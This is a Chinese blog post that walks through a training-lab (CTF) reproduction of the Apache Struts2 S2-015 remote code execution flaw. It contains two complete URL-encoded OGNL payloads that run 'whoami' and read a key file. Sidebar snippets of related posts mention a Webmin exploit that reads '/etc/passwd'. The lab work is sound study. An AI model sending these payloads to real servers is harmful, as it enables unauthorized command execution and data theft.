0x22. Apache Struts2远程代码执行漏洞(S2-015)复现

最新推荐文章于 2024-04-06 11:09:56 发布
最新推荐文章于 2024-04-06 11:09:56 发布
阅读量337 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 s2-015
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102600512
版权

s2-015:1.漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式;2.通过result二次引用执行;

通过poc测试是否存在s2-015漏洞;
poc:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action

发现能够执行whoami命令;
修改poc即可查找到key.txt文件位置并查看文件得到key值;
poc:
%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

漏洞详情:

https://github.com/vulhub/vulhub/tree/master/struts2/s2-015

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 721
[ vulhub漏洞篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码
S2-015 远程代码执行漏洞
锋刃科技的博客
06-28 611
影响版本 2.0.0 - 2.3.14.2 环境搭建 cd vulhub/struts2/s2-015 docker-compose build && docker-compose up -d 漏洞分析 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: <package name="S2-015" extends="struts-default"> <action name="*" c
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 2387
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2;Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
vulhub中 Struts2-015 远程代码执行漏洞
最新发布
yougexiaojiuguan的博客
04-06 434
漏洞过程的记录
Apache Struts2远程代码执行漏洞(S2-029)
qq_36933272的博客
09-03 1564
打开源代码,发传递信息的参数是message 查找S-2-029的poc,(#_memberAccess[‘allowPrivateAccess’]=true,#_memberAccess[‘allowProtectedAccess’]=true,#_memberAccess[‘excludedPackageNamePatterns’]=#_memberAccess[‘acceptPropert...
Apache Struts2远程代码执行漏洞(S2-001)
qq_36933272的博客
09-01 828
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击.pdf
06-24
漏洞允许未经身份验证的攻击者通过特制的数据包利用此漏洞远程代码执行,从而控制受影响的系统。由于其潜在的危害性,微软在2019年5月发布了紧急更新,并强烈建议所有用户尽快打上补丁。MetaSploit是一款广泛...
windows无法连接到打印机SHA-2代码签名补丁win7修工具打印机连接错误0x0004005.rar
12-16
在使用Windows操作系统时,尤其是Windows 7或更早版本,可能会遇到“无法连接到打印机”的问题,这种情况通常伴随着错误代码0x00004005。此问题的根源可能涉及多种因素,包括系统兼容性、驱动程序不兼容、网络连接...
apache 2.2.14漏洞代码和exp
03-31
apache 2.2.14漏洞代码和exp
毕业设计企业网站源码-s2-052-reproducing:s2-052-
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
s2-015远程代码执行漏洞
Stephen Wolf
11-19 2458
一、漏洞描述: 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: ```xml <package name="S2-015" extends="struts-default"> <action name="*" class="com.demo.action.PageAction"> ...
Struts2 S2-015
ZJT6666666的博客
02-04 318
Struts2 S2-015
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)
JimWu的博客
09-04 2003
Apache Struts2远程代码执行漏洞(S2-015) 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
[漏洞]Apache Struts2/S2-015 (CVE-2013-2134)
k5664524的博客
01-18 507
2.3.14.3 之前的 Apache Struts 2 允许远程攻击者通过带有在通配符匹配期间未正确处理的精心制作的操作名称的请求执行任意 OGNL 代码,这是与 CVE-2013-2135 不同的漏洞
记一次靶场实战【网络安全】
kali_Ma的博客
01-05 8607
可以得到靶机开放了22和80端口,使用的是Apache2.2.22和Ubuntu,内核是Linux3.2-4.9。 接下来用御剑暴破下目录。
0x21.Apache Struts2远程代码执行漏洞(S2-007)
qq_31679787的博客
10-16 5971
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
arm编程实0x5000开始20个字数据存储单元 0x44332201到0x44332214.并将小端转换为大端
03-22
以下是实该功能的 ARM 汇编代码: ``` .section .data data: .byte 0x01, 0x22, 0x33, 0x44 .byte 0x02, 0x22, 0x33, 0x44 .byte 0x03, 0x22, 0x33, 0x44 .byte 0x04, 0x22, 0x33, 0x44 .byte 0x05, 0x22, 0x33, 0x44 .byte 0x06, 0x22, 0x33, 0x44 .byte 0x07, 0x22, 0x33, 0x44 .byte 0x08, 0x22, 0x33, 0x44 .byte 0x09, 0x22, 0x33, 0x44 .byte 0x0A, 0x22, 0x33, 0x44 .byte 0x0B, 0x22, 0x33, 0x44 .byte 0x0C, 0x22, 0x33, 0x44 .byte 0x0D, 0x22, 0x33, 0x44 .byte 0x0E, 0x22, 0x33, 0x44 .byte 0x0F, 0x22, 0x33, 0x44 .byte 0x10, 0x22, 0x33, 0x44 .byte 0x11, 0x22, 0x33, 0x44 .byte 0x12, 0x22, 0x33, 0x44 .byte 0x13, 0x22, 0x33, 0x44 .byte 0x14, 0x22, 0x33, 0x44 .section .text .global main main: mov r0, #0x5000 ldr r1, =data mov r2, #20 loop: ldrb r3, [r1], #1 strb r3, [r0], #1 subs r2, r2, #1 bne loop bx lr ``` 这段代码将数据存储在 .data 段中,然后使用循环将数据从 .data 段制到指定的内存地址。在制时,使用 ldrb 和 strb 指令来处理单个字节,以确保正确的字节顺序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值